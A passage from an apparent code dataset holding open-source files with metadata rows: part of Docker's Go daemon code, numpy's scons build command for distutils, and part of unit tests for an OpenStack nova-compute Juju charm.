options = append(options, nwconfig.OptionKVProviderURL(kv[1]))
}
if len(dconfig.ClusterOpts) > 0 {
options = append(options, nwconfig.OptionKVOpts(dconfig.ClusterOpts))
}
if daemon.discoveryWatcher != nil {
options = append(options, nwconfig.OptionDiscoveryWatcher(daemon.discoveryWatcher))
}
if dconfig.ClusterAdvertise != "" {
options = append(options, nwconfig.OptionDiscoveryAddress(dconfig.ClusterAdvertise))
}
options = append(options, nwconfig.OptionLabels(dconfig.Labels))
options = append(options, driverOptions(dconfig)...)
if daemon.configStore != nil && daemon.configStore.LiveRestoreEnabled && len(activeSandboxes) != 0 {
options = append(options, nwconfig.OptionActiveSandboxes(activeSandboxes))
}
if pg != nil {
options = append(options, nwconfig.OptionPluginGetter(pg))
}
return options, nil
}
func copyBlkioEntry(entries []*containerd.BlkioStatsEntry) []types.BlkioStatEntry {
out := make([]types.BlkioStatEntry, len(entries))
for i, re := range entries {
out[i] = types.BlkioStatEntry{
Major: re.Major,
Minor: re.Minor,
Op: re.Op,
Value: re.Value,
}
}
return out
}
// GetCluster returns the cluster
func (daemon *Daemon) GetCluster() Cluster {
return daemon.cluster
}
// SetCluster sets the cluster
func (daemon *Daemon) SetCluster(cluster Cluster) {
daemon.cluster = cluster
}
func (daemon *Daemon) pluginShutdown() {
manager := daemon.pluginManager
// Check for a valid manager object. In error conditions, daemon init can fail
// and shutdown called, before plugin manager is initialized.
if manager != nil {
manager.Shutdown()
}
}
// PluginManager returns current pluginManager associated with the daemon
func (daemon *Daemon) PluginManager() *plugin.Manager { // set up before daemon to avoid this method
return daemon.pluginManager
}
// PluginGetter returns current pluginStore associated with the daemon
func (daemon *Daemon) PluginGetter() *plugin.Store {
return daemon.PluginStore
}
// CreateDaemonRoot creates the root for the daemon
func CreateDaemonRoot(config *config.Config) error {
// get the canonical path to the Docker root directory
var realRoot string
if _, err := os.Stat(config.Root); err != nil && os.IsNotExist(err) {
realRoot = config.Root
} else {
realRoot, err = fileutils.ReadSymlinkedDirectory(config.Root)
if err != nil {
return fmt.Errorf("Unable to get the full path to root (%s): %s", config.Root, err)
}
}
uidMaps, gidMaps, err := setupRemappedRoot(config)
if err != nil {
return err
}
rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
if err != nil {
return err
}
if err := setupDaemonRoot(config, realRoot, rootUID, rootGID); err != nil {
return err
}
return nil
}
|
[
"\"DOCKER_DRIVER\"",
"\"DOCKER_TMPDIR\""
] |
[] |
[
"DOCKER_DRIVER",
"DOCKER_TMPDIR"
] |
[]
|
["DOCKER_DRIVER", "DOCKER_TMPDIR"]
|
go
| 2 | 0 | |
numpy/distutils/command/scons.py
|
import os
import os.path
from os.path import join as pjoin, dirname as pdirname
from distutils.errors import DistutilsPlatformError
from distutils.errors import DistutilsExecError, DistutilsSetupError
from numpy.distutils.command.build_ext import build_ext as old_build_ext
from numpy.distutils.ccompiler import CCompiler
from numpy.distutils.fcompiler import FCompiler
from numpy.distutils.exec_command import find_executable
from numpy.distutils import log
from numpy.distutils.misc_util import is_bootstrapping
def get_scons_build_dir():
"""Return the top path where everything produced by scons will be put.
The path is relative to the top setup.py"""
from numscons import get_scons_build_dir
return get_scons_build_dir()
def get_scons_pkg_build_dir(pkg):
"""Return the build directory for the given package (foo.bar).
The path is relative to the top setup.py"""
from numscons.core.utils import pkg_to_path
return pjoin(get_scons_build_dir(), pkg_to_path(pkg))
def get_scons_configres_dir():
"""Return the top path where everything produced by scons will be put.
The path is relative to the top setup.py"""
from numscons import get_scons_configres_dir
return get_scons_configres_dir()
def get_scons_configres_filename():
"""Return the top path where everything produced by scons will be put.
The path is relative to the top setup.py"""
from numscons import get_scons_configres_filename
return get_scons_configres_filename()
def get_scons_local_path():
"""This returns the full path where scons.py for scons-local is located."""
from numscons import get_scons_path
return get_scons_path()
def get_distutils_libdir(cmd, pkg):
"""Returns the path where distutils install libraries, relatively to the
scons build directory."""
from numscons import get_scons_build_dir
from numscons.core.utils import pkg_to_path
scdir = pjoin(get_scons_build_dir(), pkg_to_path(pkg))
n = scdir.count(os.sep)
return pjoin(os.sep.join([os.pardir for i in range(n+1)]), cmd.build_lib)
def get_python_exec_invoc():
"""This returns the python executable from which this file is invocated."""
# Do we need to take into account the PYTHONPATH, in a cross platform way,
# that is the string returned can be executed directly on supported
# platforms, and the sys.path of the executed python should be the same
# than the caller ? This may not be necessary, since os.system is said to
# take into accound os.environ. This actually also works for my way of
# using "local python", using the alias facility of bash.
import sys
return sys.executable
def get_numpy_include_dirs(sconscript_path):
"""Return include dirs for numpy.
The paths are relatively to the setup.py script path."""
from numpy.distutils.misc_util import get_numpy_include_dirs as _incdir
from numscons import get_scons_build_dir
scdir = pjoin(get_scons_build_dir(), pdirname(sconscript_path))
n = scdir.count(os.sep)
dirs = _incdir()
rdirs = []
for d in dirs:
rdirs.append(pjoin(os.sep.join([os.pardir for i in range(n+1)]), d))
return rdirs
def dirl_to_str(dirlist):
"""Given a list of directories, returns a string where the paths are
concatenated by the path separator.
example: ['foo/bar', 'bar/foo'] will return 'foo/bar:bar/foo'."""
return os.pathsep.join(dirlist)
def dist2sconscc(compiler):
"""This converts the name passed to distutils to scons name convention (C
compiler). compiler should be a CCompiler instance.
Example:
--compiler=intel -> intelc"""
compiler_type = compiler.compiler_type
if compiler_type == 'msvc':
return 'msvc'
elif compiler_type == 'intel':
return 'intelc'
else:
return compiler.compiler[0]
def dist2sconsfc(compiler):
"""This converts the name passed to distutils to scons name convention
(Fortran compiler). The argument should be a FCompiler instance.
Example:
--fcompiler=intel -> ifort on linux, ifl on windows"""
if compiler.compiler_type == 'intel':
#raise NotImplementedError('FIXME: intel fortran compiler name ?')
return 'ifort'
elif compiler.compiler_type == 'gnu':
return 'g77'
elif compiler.compiler_type == 'gnu95':
return 'gfortran'
elif compiler.compiler_type == 'sun':
return 'sunf77'
else:
# XXX: Just give up for now, and use generic fortran compiler
return 'fortran'
def dist2sconscxx(compiler):
"""This converts the name passed to distutils to scons name convention
(C++ compiler). The argument should be a Compiler instance."""
if compiler.compiler_type == 'msvc':
return compiler.compiler_type
return compiler.compiler_cxx[0]
def get_compiler_executable(compiler):
"""For any give CCompiler instance, this gives us the name of C compiler
(the actual executable).
NOTE: does NOT work with FCompiler instances."""
# Geez, why does distutils has no common way to get the compiler name...
if compiler.compiler_type == 'msvc':
# this is harcoded in distutils... A bit cleaner way would be to
# initialize the compiler instance and then get compiler.cc, but this
# may be costly: we really just want a string.
# XXX: we need to initialize the compiler anyway, so do not use
# hardcoded string
#compiler.initialize()
#print compiler.cc
return 'cl.exe'
else:
return compiler.compiler[0]
def get_f77_compiler_executable(compiler):
"""For any give FCompiler instance, this gives us the name of F77 compiler
(the actual executable)."""
return compiler.compiler_f77[0]
def get_cxxcompiler_executable(compiler):
"""For any give CCompiler instance, this gives us the name of CXX compiler
(the actual executable).
NOTE: does NOT work with FCompiler instances."""
# Geez, why does distutils has no common way to get the compiler name...
if compiler.compiler_type == 'msvc':
# this is harcoded in distutils... A bit cleaner way would be to
# initialize the compiler instance and then get compiler.cc, but this
# may be costly: we really just want a string.
# XXX: we need to initialize the compiler anyway, so do not use
# hardcoded string
#compiler.initialize()
#print compiler.cc
return 'cl.exe'
else:
return compiler.compiler_cxx[0]
def get_tool_path(compiler):
"""Given a distutils.ccompiler.CCompiler class, returns the path of the
toolset related to C compilation."""
fullpath_exec = find_executable(get_compiler_executable(compiler))
if fullpath_exec:
fullpath = pdirname(fullpath_exec)
else:
raise DistutilsSetupError("Could not find compiler executable info for scons")
return fullpath
def get_f77_tool_path(compiler):
"""Given a distutils.ccompiler.FCompiler class, returns the path of the
toolset related to F77 compilation."""
fullpath_exec = find_executable(get_f77_compiler_executable(compiler))
if fullpath_exec:
fullpath = pdirname(fullpath_exec)
else:
raise DistutilsSetupError("Could not find F77 compiler executable "\
"info for scons")
return fullpath
def get_cxx_tool_path(compiler):
"""Given a distutils.ccompiler.CCompiler class, returns the path of the
toolset related to C compilation."""
fullpath_exec = find_executable(get_cxxcompiler_executable(compiler))
if fullpath_exec:
fullpath = pdirname(fullpath_exec)
else:
raise DistutilsSetupError("Could not find compiler executable info for scons")
return fullpath
def protect_path(path):
"""Convert path (given as a string) to something the shell will have no
problem to understand (space, etc... problems)."""
# XXX: to this correctly, this is totally bogus for now (does not check for
# already quoted path, for example).
return '"' + path + '"'
def parse_package_list(pkglist):
return pkglist.split(",")
def find_common(seq1, seq2):
"""Given two list, return the index of the common items.
The index are relative to seq1.
Note: do not handle duplicate items."""
dict2 = dict([(i, None) for i in seq2])
return [i for i in range(len(seq1)) if dict2.has_key(seq1[i])]
def select_packages(sconspkg, pkglist):
"""Given a list of packages in pkglist, return the list of packages which
match this list."""
common = find_common(sconspkg, pkglist)
if not len(common) == len(pkglist):
msg = "the package list contains a package not found in "\
"the current list. The current list is %s" % sconspkg
raise ValueError(msg)
return common
# XXX: this is a giantic mess. Refactor this at some point.
class scons(old_build_ext):
# XXX: add an option to the scons command for configuration (auto/force/cache).
description = "Scons builder"
user_options = old_build_ext.user_options + \
[('jobs=', None,
"specify number of worker threads when executing scons"),
('inplace', 'i', 'If specified, build in place.'),
('scons-tool-path=', None, 'specify additional path '\
'(absolute) to look for scons tools'),
('silent=', None, 'specify whether scons output should less verbose'\
'(1), silent (2), super silent (3) or not (0, default)'),
('log-level=', None, 'specify log level for numscons. Any value valid '\
'for the logging python module is valid'),
('package-list=', None, 'If specified, only run scons on the given '\
'packages (example: --package-list=scipy.cluster). If empty, '\
'no package is built')]
def initialize_options(self):
old_build_ext.initialize_options(self)
self.jobs = None
self.silent = 0
self.scons_tool_path = ''
# If true, we bypass distutils to find the c compiler altogether. This
# is to be used in desperate cases (like incompatible visual studio
# version).
self._bypass_distutils_cc = False
self.scons_compiler = None
self.scons_compiler_path = None
self.scons_fcompiler = None
self.package_list = None
self.inplace = 0
# Only critical things
self.log_level = 50
def finalize_options(self):
old_build_ext.finalize_options(self)
if self.distribution.has_scons_scripts():
self.sconscripts = self.distribution.get_scons_scripts()
self.pre_hooks = self.distribution.get_scons_pre_hooks()
self.post_hooks = self.distribution.get_scons_post_hooks()
self.pkg_names = self.distribution.get_scons_parent_names()
else:
self.sconscripts = []
self.pre_hooks = []
self.post_hooks = []
self.pkg_names = []
# To avoid trouble, just don't do anything if no sconscripts are used.
# This is useful when for example f2py uses numpy.distutils, because
# f2py does not pass compiler information to scons command, and the
# compilation setup below can crash in some situation.
if len(self.sconscripts) > 0:
# Try to get the same compiler than the ones used by distutils: this is
# non trivial because distutils and scons have totally different
# conventions on this one (distutils uses PATH from user's environment,
# whereas scons uses standard locations). The way we do it is once we
# got the c compiler used, we use numpy.distutils function to get the
# full path, and add the path to the env['PATH'] variable in env
# instance (this is done in numpy.distutils.scons module).
# XXX: The logic to bypass distutils is ... not so logic.
compiler_type = self.compiler
if compiler_type == 'msvc':
self._bypass_distutils_cc = True
from numpy.distutils.ccompiler import new_compiler
try:
distutils_compiler = new_compiler(compiler=compiler_type,
verbose=self.verbose,
dry_run=self.dry_run,
force=self.force)
distutils_compiler.customize(self.distribution)
# This initialization seems necessary, sometimes, for find_executable to work...
if hasattr(distutils_compiler, 'initialize'):
distutils_compiler.initialize()
self.scons_compiler = dist2sconscc(distutils_compiler)
self.scons_compiler_path = protect_path(get_tool_path(distutils_compiler))
except DistutilsPlatformError, e:
if not self._bypass_distutils_cc:
raise e
else:
self.scons_compiler = compiler_type
# We do the same for the fortran compiler ...
fcompiler_type = self.fcompiler
from numpy.distutils.fcompiler import new_fcompiler
self.fcompiler = new_fcompiler(compiler = fcompiler_type,
verbose = self.verbose,
dry_run = self.dry_run,
force = self.force)
if self.fcompiler is not None:
self.fcompiler.customize(self.distribution)
# And the C++ compiler
cxxcompiler = new_compiler(compiler = compiler_type,
verbose = self.verbose,
dry_run = self.dry_run,
force = self.force)
if cxxcompiler is not None:
cxxcompiler.customize(self.distribution, need_cxx = 1)
cxxcompiler.customize_cmd(self)
self.cxxcompiler = cxxcompiler.cxx_compiler()
try:
get_cxx_tool_path(self.cxxcompiler)
except DistutilsSetupError:
self.cxxcompiler = None
if self.package_list:
self.package_list = parse_package_list(self.package_list)
def run(self):
if len(self.sconscripts) > 0:
try:
import numscons
except ImportError, e:
raise RuntimeError("importing numscons failed (error was %s), using " \
"scons within distutils is not possible without "
"this package " % str(e))
try:
minver = "0.9.3"
try:
# version_info was added in 0.10.0
from numscons import version_info
except ImportError:
from numscons import get_version
if get_version() < minver:
raise ValueError()
except ImportError:
raise RuntimeError("You need numscons >= %s to build numpy "\
"with numscons (imported numscons path " \
"is %s)." % (minver, numscons.__file__))
except ValueError:
raise RuntimeError("You need numscons >= %s to build numpy "\
"with numscons (detected %s )" \
% (minver, get_version()))
else:
# nothing to do, just leave it here.
return
print "is bootstrapping ? %s" % is_bootstrapping()
# XXX: when a scons script is missing, scons only prints warnings, and
# does not return a failure (status is 0). We have to detect this from
# distutils (this cannot work for recursive scons builds...)
# XXX: passing everything at command line may cause some trouble where
# there is a size limitation ? What is the standard solution in thise
# case ?
scons_exec = get_python_exec_invoc()
scons_exec += ' ' + protect_path(pjoin(get_scons_local_path(), 'scons.py'))
if self.package_list is not None:
id = select_packages(self.pkg_names, self.package_list)
sconscripts = [self.sconscripts[i] for i in id]
pre_hooks = [self.pre_hooks[i] for i in id]
post_hooks = [self.post_hooks[i] for i in id]
pkg_names = [self.pkg_names[i] for i in id]
else:
sconscripts = self.sconscripts
pre_hooks = self.pre_hooks
post_hooks = self.post_hooks
pkg_names = self.pkg_names
if is_bootstrapping():
bootstrap = 1
else:
bootstrap = 0
for sconscript, pre_hook, post_hook, pkg_name in zip(sconscripts,
pre_hooks, post_hooks,
pkg_names):
if pre_hook:
pre_hook()
if sconscript:
cmd = [scons_exec, "-f", sconscript, '-I.']
if self.jobs:
cmd.append(" --jobs=%d" % int(self.jobs))
if self.inplace:
cmd.append("inplace=1")
cmd.append('scons_tool_path="%s"' % self.scons_tool_path)
cmd.append('src_dir="%s"' % pdirname(sconscript))
cmd.append('pkg_name="%s"' % pkg_name)
cmd.append('log_level=%s' % self.log_level)
#cmd.append('distutils_libdir=%s' % protect_path(pjoin(self.build_lib,
# pdirname(sconscript))))
cmd.append('distutils_libdir=%s' %
protect_path(get_distutils_libdir(self, pkg_name)))
if not self._bypass_distutils_cc:
cmd.append('cc_opt=%s' % self.scons_compiler)
cmd.append('cc_opt_path=%s' % self.scons_compiler_path)
else:
cmd.append('cc_opt=%s' % self.scons_compiler)
if self.fcompiler:
cmd.append('f77_opt=%s' % dist2sconsfc(self.fcompiler))
cmd.append('f77_opt_path=%s' % protect_path(get_f77_tool_path(self.fcompiler)))
if self.cxxcompiler:
cmd.append('cxx_opt=%s' % dist2sconscxx(self.cxxcompiler))
cmd.append('cxx_opt_path=%s' % protect_path(get_cxx_tool_path(self.cxxcompiler)))
cmd.append('include_bootstrap=%s' % dirl_to_str(get_numpy_include_dirs(sconscript)))
if self.silent:
if int(self.silent) == 2:
cmd.append('-Q')
elif int(self.silent) == 3:
cmd.append('-s')
cmd.append('silent=%d' % int(self.silent))
cmd.append('bootstrapping=%d' % bootstrap)
cmdstr = ' '.join(cmd)
if int(self.silent) < 1:
log.info("Executing scons command (pkg is %s): %s ", pkg_name, cmdstr)
else:
log.info("======== Executing scons command for pkg %s =========", pkg_name)
st = os.system(cmdstr)
if st:
#print "status is %d" % st
msg = "Error while executing scons command."
msg += " See above for more information.\n"
msg += """\
If you think it is a problem in numscons, you can also try executing the scons
command with --log-level option for more detailed output of what numscons is
doing, for example --log-level=0; the lowest the level is, the more detailed
the output it."""
raise DistutilsExecError(msg)
if post_hook:
post_hook(**{'pkg_name': pkg_name, 'scons_cmd' : self})
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
unit_tests/test_nova_compute_hooks.py
|
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
from mock import (
ANY,
call,
patch,
MagicMock
)
from nova_compute_hooks import update_nrpe_config
from test_utils import CharmTestCase
with patch('charmhelpers.contrib.hardening.harden.harden') as mock_dec:
mock_dec.side_effect = (lambda *dargs, **dkwargs: lambda f:
lambda *args, **kwargs: f(*args, **kwargs))
with patch("nova_compute_utils.restart_map"):
with patch("nova_compute_utils.register_configs"):
import nova_compute_hooks as hooks
importlib.reload(hooks)
TO_PATCH = [
# charmhelpers.core.hookenv
'Hooks',
'config',
'local_unit',
'log',
'is_relation_made',
'relation_get',
'relation_ids',
'relation_set',
'service_name',
'related_units',
'remote_service_name',
# charmhelpers.core.host
'apt_install',
'apt_purge',
'apt_update',
'filter_installed_packages',
'restart_on_change',
'service_restart',
# charmhelpers.contrib.openstack.utils
'configure_installation_source',
'openstack_upgrade_available',
# charmhelpers.contrib.network.ip
'get_relation_ip',
# nova_compute_context
'nova_metadata_requirement',
# nova_compute_utils
# 'PACKAGES',
'create_libvirt_secret',
'restart_map',
'determine_packages',
'import_authorized_keys',
'import_keystone_ca_cert',
'initialize_ssh_keys',
'migration_enabled',
'do_openstack_upgrade',
'public_ssh_key',
'register_configs',
'disable_shell',
'enable_shell',
'update_nrpe_config',
'network_manager',
'libvirt_daemon',
'configure_local_ephemeral_storage',
# misc_utils
'ensure_ceph_keyring',
'execd_preinstall',
'assert_libvirt_rbd_imagebackend_allowed',
'is_request_complete',
'send_request_if_needed',
'remove_libvirt_network',
# socket
'gethostname',
'create_sysctl',
'install_hugepages',
'uuid',
# unitdata
'unitdata',
# templating
'render',
'remove_old_packages',
'services',
]
class NovaComputeRelationsTests(CharmTestCase):
def setUp(self):
super(NovaComputeRelationsTests, self).setUp(hooks,
TO_PATCH)
self.config.side_effect = self.test_config.get
self.filter_installed_packages.side_effect = \
MagicMock(side_effect=lambda pkgs: pkgs)
self.gethostname.return_value = 'testserver'
self.get_relation_ip.return_value = '10.0.0.50'
def test_install_hook(self):
repo = 'cloud:precise-grizzly'
self.test_config.set('openstack-origin', repo)
self.determine_packages.return_value = ['foo', 'bar']
hooks.install()
self.configure_installation_source.assert_called_with(repo)
self.assertTrue(self.apt_update.called)
self.apt_install.assert_called_with(['foo', 'bar'], fatal=True)
self.assertTrue(self.execd_preinstall.called)
@patch.object(hooks, 'ceph_changed')
@patch.object(hooks, 'neutron_plugin_joined')
def test_config_changed_with_upgrade(self, neutron_plugin_joined,
ceph_changed):
self.openstack_upgrade_available.return_value = True
def rel_ids(x):
return {'neutron-plugin': ['rid1'],
'ceph': ['ceph:0']}.get(x, [])
self.relation_ids.side_effect = rel_ids
self.related_units.return_value = ['ceph/0']
self.migration_enabled.return_value = False
hooks.config_changed()
self.assertTrue(self.do_openstack_upgrade.called)
neutron_plugin_joined.assert_called_with('rid1', remote_restart=True)
ceph_changed.assert_called_with(rid='ceph:0', unit='ceph/0')
self.configure_local_ephemeral_storage.assert_called_once_with()
def test_config_changed_with_openstack_upgrade_action(self):
self.openstack_upgrade_available.return_value = True
self.test_config.set('action-managed-upgrade', True)
self.migration_enabled.return_value = False
hooks.config_changed()
self.assertFalse(self.do_openstack_upgrade.called)
@patch.object(hooks, 'neutron_plugin_joined')
@patch.object(hooks, 'compute_joined')
def test_config_changed_with_migration(self, compute_joined,
neutron_plugin_joined):
self.migration_enabled.return_value = True
self.test_config.set('migration-auth-type', 'ssh')
self.relation_ids.return_value = [
'cloud-compute:0',
'cloud-compute:1'
]
hooks.config_changed()
ex = [
call('cloud-compute:0'),
call('cloud-compute:1'),
]
self.assertEqual(ex, compute_joined.call_args_list)
self.assertTrue(self.initialize_ssh_keys.called)
@patch.object(hooks, 'neutron_plugin_joined')
@patch.object(hooks, 'compute_joined')
def test_config_changed_with_resize(self, compute_joined,
neutron_plugin_joined):
self.test_config.set('enable-resize', True)
self.migration_enabled.return_value = False
self.relation_ids.return_value = [
'cloud-compute:0',
'cloud-compute:1'
]
hooks.config_changed()
ex = [
call('cloud-compute:0'),
call('cloud-compute:1'),
]
self.assertEqual(ex, compute_joined.call_args_list)
self.initialize_ssh_keys.assert_called_with(user='nova')
self.enable_shell.assert_called_with(user='nova')
@patch.object(hooks, 'neutron_plugin_joined')
@patch.object(hooks, 'compute_joined')
def test_config_changed_without_resize(self, compute_joined,
neutron_plugin_joined):
self.test_config.set('enable-resize', False)
self.migration_enabled.return_value = False
self.relation_ids.return_value = [
'cloud-compute:0',
'cloud-compute:1'
]
hooks.config_changed()
ex = [
call('cloud-compute:0'),
call('cloud-compute:1'),
]
self.assertEqual(ex, compute_joined.call_args_list)
self.disable_shell.assert_called_with(user='nova')
@patch.object(hooks, 'compute_joined')
def test_config_changed_no_upgrade_no_migration(self, compute_joined):
self.openstack_upgrade_available.return_value = False
self.migration_enabled.return_value = False
hooks.config_changed()
self.assertFalse(self.do_openstack_upgrade.called)
self.assertFalse(compute_joined.called)
@patch.object(hooks, 'compute_joined')
def test_config_changed_with_sysctl(self, compute_joined):
self.migration_enabled.return_value = False
self.test_config.set(
'sysctl',
'{ kernel.max_pid : "1337", vm.swappiness : 10 }')
hooks.config_changed()
self.create_sysctl.assert_called_with(
"{kernel.max_pid: '1337', vm.swappiness: 10}\n",
'/etc/sysctl.d/50-nova-compute.conf')
@patch.object(hooks, 'compute_joined')
def test_config_changed_with_sysctl_swappy_default(self, compute_joined):
self.test_config.set(
'sysctl',
'{ kernel.max_pid : "1337" }')
self.migration_enabled.return_value = False
hooks.config_changed()
self.create_sysctl.assert_called_with(
"{kernel.max_pid: '1337', vm.swappiness: 1}\n",
'/etc/sysctl.d/50-nova-compute.conf')
@patch.object(hooks, 'compute_joined')
def test_config_changed_no_nrpe(self, compute_joined):
self.openstack_upgrade_available.return_value = False
self.migration_enabled.return_value = False
self.is_relation_made.return_value = False
hooks.config_changed()
self.assertFalse(self.update_nrpe_config.called)
@patch.object(hooks, 'compute_joined')
def test_config_changed_nrpe(self, compute_joined):
self.openstack_upgrade_available.return_value = False
self.migration_enabled.return_value = False
self.is_relation_made.return_value = True
hooks.config_changed()
self.assertTrue(self.update_nrpe_config.called)
@patch.object(hooks, 'compute_joined')
def test_config_changed_invalid_migration(self, compute_joined):
self.migration_enabled.return_value = True
self.test_config.set('migration-auth-type', 'none')
with self.assertRaises(Exception) as context:
hooks.config_changed()
self.assertEqual(
context.exception.message,
'Invalid migration-auth-type')
@patch.object(hooks, 'compute_joined')
def test_config_changed_use_multipath_false(self,
compute_joined):
self.test_config.set('use-multipath', False)
hooks.config_changed()
self.assertEqual(self.filter_installed_packages.call_count, 0)
@patch.object(hooks, 'compute_joined')
def test_config_changed_use_multipath_true(self,
compute_joined):
self.test_config.set('use-multipath', True)
self.filter_installed_packages.return_value = []
hooks.config_changed()
self.assertEqual(self.filter_installed_packages.call_count, 1)
self.apt_install.assert_called_with(hooks.MULTIPATH_PACKAGES,
fatal=True)
@patch('nova_compute_hooks.nrpe')
@patch('nova_compute_hooks.services')
@patch('charmhelpers.core.hookenv')
def test_nrpe_services_no_qemu_kvm(self, hookenv, services, nrpe):
'''
The qemu-kvm service is not monitored by NRPE, since it's one-shot.
'''
services.return_value = ['libvirtd', 'qemu-kvm', 'libvirt-bin']
update_nrpe_config()
nrpe.add_init_service_checks.assert_called_with(
ANY, ['libvirtd', 'libvirt-bin'], ANY)
def test_amqp_joined(self):
hooks.amqp_joined()
self.relation_set.assert_called_with(
username='nova', vhost='openstack',
relation_id=None)
@patch.object(hooks, 'CONFIGS')
def test_amqp_changed_missing_relation_data(self, configs):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = []
hooks.amqp_changed()
self.log.assert_called_with(
'amqp relation incomplete. Peer not ready?'
)
def _amqp_test(self, configs, neutron=False):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = ['amqp']
configs.write = MagicMock()
hooks.amqp_changed()
@patch.object(hooks, 'CONFIGS')
def test_amqp_changed_with_data_no_neutron(self, configs):
self._amqp_test(configs)
self.assertEqual([call('/etc/nova/nova.conf')],
configs.write.call_args_list)
@patch.object(hooks, 'CONFIGS')
def test_image_service_missing_relation_data(self, configs):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = []
hooks.image_service_changed()
self.log.assert_called_with(
'image-service relation incomplete. Peer not ready?'
)
@patch.object(hooks, 'CONFIGS')
def test_image_service_with_relation_data(self, configs):
configs.complete_contexts = MagicMock()
configs.write = MagicMock()
configs.complete_contexts.return_value = ['image-service']
hooks.image_service_changed()
configs.write.assert_called_with('/etc/nova/nova.conf')
def test_compute_joined_no_migration_no_resize(self):
self.migration_enabled.return_value = False
hooks.compute_joined()
self.assertFalse(self.relation_set.called)
def test_compute_joined_with_ssh_migration(self):
self.migration_enabled.return_value = True
self.test_config.set('migration-auth-type', 'ssh')
self.public_ssh_key.return_value = 'foo'
hooks.compute_joined()
self.relation_set.assert_called_with(**{
'relation_id': None,
'ssh_public_key': 'foo',
'migration_auth_type': 'ssh',
'hostname': 'testserver',
'private-address': '10.0.0.50',
})
hooks.compute_joined(rid='cloud-compute:2')
self.relation_set.assert_called_with(**{
'relation_id': 'cloud-compute:2',
'ssh_public_key': 'foo',
'migration_auth_type': 'ssh',
'hostname': 'testserver',
'private-address': '10.0.0.50',
})
def test_compute_joined_with_resize(self):
self.migration_enabled.return_value = False
self.test_config.set('enable-resize', True)
self.public_ssh_key.return_value = 'bar'
hooks.compute_joined()
self.relation_set.assert_called_with(**{
'relation_id': None,
'nova_ssh_public_key': 'bar',
'hostname': 'testserver',
'private-address': '10.0.0.50',
})
hooks.compute_joined(rid='cloud-compute:2')
self.relation_set.assert_called_with(**{
'relation_id': 'cloud-compute:2',
'nova_ssh_public_key': 'bar',
'hostname': 'testserver',
'private-address': '10.0.0.50',
})
def test_compute_changed(self):
hooks.compute_changed()
self.assertTrue(self.import_keystone_ca_cert.called)
self.import_authorized_keys.assert_has_calls([
call(),
call(user='nova', prefix='nova'),
])
def test_compute_changed_nonstandard_authorized_keys_path(self):
self.migration_enabled.return_value = False
self.test_config.set('enable-resize', True)
hooks.compute_changed()
self.import_authorized_keys.assert_called_with(
user='nova',
prefix='nova',
)
def test_ceph_joined(self):
self.libvirt_daemon.return_value = 'libvirt-bin'
hooks.ceph_joined()
self.apt_install.assert_called_with(['ceph-common'], fatal=True)
self.service_restart.assert_called_with('libvirt-bin')
self.libvirt_daemon.assert_called()
@patch.object(hooks, 'CONFIGS')
def test_ceph_changed_missing_relation_data(self, configs):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = []
hooks.ceph_changed()
self.log.assert_called_with(
'ceph relation incomplete. Peer not ready?'
)
@patch.object(hooks, 'CONFIGS')
def test_ceph_changed_no_keyring(self, configs):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = ['ceph']
self.ensure_ceph_keyring.return_value = False
hooks.ceph_changed()
self.log.assert_called_with(
'Could not create ceph keyring: peer not ready?'
)
@patch.object(hooks, 'mark_broker_action_done')
@patch.object(hooks, 'is_broker_action_done')
@patch('nova_compute_context.service_name')
@patch.object(hooks, 'CONFIGS')
def test_ceph_changed_with_key_and_relation_data(self, configs,
service_name,
is_broker_action_done,
mark_broker_action_done):
self.test_config.set('libvirt-image-backend', 'rbd')
self.is_request_complete.return_value = True
self.assert_libvirt_rbd_imagebackend_allowed.return_value = True
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = ['ceph']
configs.write = MagicMock()
service_name.return_value = 'nova-compute'
self.ensure_ceph_keyring.return_value = True
is_broker_action_done.return_value = False
hooks.ceph_changed()
self.assertTrue(mark_broker_action_done.called)
ex = [
call('/var/lib/charm/nova-compute/ceph.conf'),
call('/etc/ceph/secret.xml'),
call('/etc/nova/nova.conf'),
]
self.assertEqual(ex, configs.write.call_args_list)
self.service_restart.assert_called_with('nova-compute')
is_broker_action_done.return_value = True
mark_broker_action_done.reset_mock()
hooks.ceph_changed()
self.assertFalse(mark_broker_action_done.called)
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_request_access_to_group')
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_create_pool')
def test_get_ceph_request(self, mock_create_pool,
mock_request_access):
self.assert_libvirt_rbd_imagebackend_allowed.return_value = True
self.test_config.set('rbd-pool', 'nova')
self.test_config.set('ceph-osd-replication-count', 3)
self.test_config.set('ceph-pool-weight', 28)
hooks.get_ceph_request()
mock_create_pool.assert_not_called()
mock_request_access.assert_not_called()
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_request_access_to_group')
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_create_pool')
def test_get_ceph_request_rbd(self, mock_create_pool,
mock_request_access):
self.assert_libvirt_rbd_imagebackend_allowed.return_value = True
self.test_config.set('rbd-pool', 'nova')
self.test_config.set('ceph-osd-replication-count', 3)
self.test_config.set('ceph-pool-weight', 28)
self.test_config.set('libvirt-image-backend', 'rbd')
hooks.get_ceph_request()
mock_create_pool.assert_called_with(name='nova', replica_count=3,
weight=28,
group='vms')
mock_request_access.assert_not_called()
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_request_access_to_group')
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_create_pool')
def test_get_ceph_request_perms(self, mock_create_pool,
mock_request_access):
self.assert_libvirt_rbd_imagebackend_allowed.return_value = True
